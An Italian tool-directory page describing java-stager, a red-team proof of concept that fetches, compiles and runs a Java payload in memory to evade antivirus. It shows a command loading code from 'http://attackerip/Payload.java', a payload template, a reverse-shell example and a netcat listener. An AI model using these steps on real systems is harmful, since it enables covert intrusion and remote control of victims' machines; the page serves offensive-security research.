Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
java-stager — Uno Stager Java PoC che può scaricare, compilare ed eseguire un file Java in memoria. | Kitploit
Strumenti/GitHubGitHub/cornerpirate/java-stager
Memory ForensicsGenerazione di PayloadAnalisi Dinamica del Codice (DAST)ExploitPost-ExploitCommand and ControlApprendimento e FormazioneRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubcornerpirate/java-stager
1073068 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

java-stager

Uno Stager Java PoC che può scaricare, compilare ed eseguire un file Java in memoria.

Vedi Repository

java-stager

Un PoC Java Stager che può scaricare, compilare ed eseguire un file Java in memoria.

Questo è solo a scopo di ricerca, non utilizzarlo dove non sei autorizzato.

Cos'è?

Questo è basato sul lavoro di James Williams dal suo talk "Next Gen AV vs My Shitty Code" disponibile qui:

https://www.youtube.com/watch?v=247m2dwLlO4&feature=youtu.be

Le parti chiave del talk per me sono:

  • Caricare uno Stager sulla vittima (tocca il disco, ma è un binario benigno)
  • Lo Stager scarica il codice grezzo tramite HTTP (che rimane in memoria)
  • Lo Stager compila il codice grezzo (anche in memoria)
  • Lo Stager esegue poi il codice compilato (anche in memoria)

Il suo esempio è in .net, ma nel talk ha suggerito che Java sarebbe in grado di utilizzare le stesse tecniche. Ho implementato un PoC grezzo che credo corrisponda alle tecniche sopra descritte.

Come usarlo

  • Clona l'intero repository.
  • Aprilo in un IDE che supporti Maven (come NetBeans)
  • Lo Stager e il payload di esempio sono disponibili nella cartella "/src/main/java".
  • Modifica lo Stager come preferisci e compila il progetto. Io stavo usando "clean/build" nel profilo predefinito.

L'output in NetBeans includeva una riga come questa:

Building jar: C:\Users\cornerpirate\Documents\NetBeansProjects\java-stager\target\JavaStager-0.1-initial.jar

Per lavorare sulla tua vittima devi caricare il file "JavaStager*.jar" e la cartella "lib" contenente Janino dalla cartella "target".

Il seguente comando eseguirà lo stager:

java -jar JavaStager-0.1-initial.jar

Ti verrà mostrato l'utilizzo come mostrato:

Proper Usage is: java -jar JavaStager-0.1-initial.jar <url>

L'"url" è l'unico parametro passato allo Stager. Un esempio di utilizzo sarebbe:

java -jar JavaStager-0.1-initial.jar http://attackerip/Payload.java

Il tuo payload deve essere in un file chiamato "Payload.java" e il tuo codice exploit deve essere in un metodo statico chiamato "Run". Il seguente mostra il template se vuoi scriverne uno tuo:

root@kitploit:~
public class Payload {
   public static void Run() {
      // Your code here
   }
}

Ho fornito un esempio di payload Reverse TCP nel file "TCPReverseShell.java". Per evitare conflitti di nomi, questo non si chiama "Payload.java" e il nome della classe è sbagliato. Il commento nell'intestazione di "TCPReverseShell.java" spiega come modificarlo per farlo funzionare.

Dovrai ospitare il tuo file "Payload.java" su un server HTTP. Puoi usare Apache se vuoi o semplici servizi HTTP/HTTPS in Python2 e Python3 come da mio blog:

https://cornerpirate.com/2016/12/16/simple-http-or-https-servers/

L'attaccante dovrà avviare un listener netcat per catturare la connessione di ritorno usando la tecnica standard nc -lvp 8044.

Maggiori Informazioni

Post del blog che spiega come funziona tutto:

https://cornerpirate.com/2018/08/06/java-stager-hide-from-av-in-memory/

Video che mostra come funzionava in pratica:

https://www.youtube.com/watch?v=-KkJVdSHPAc

Scarica lo strumento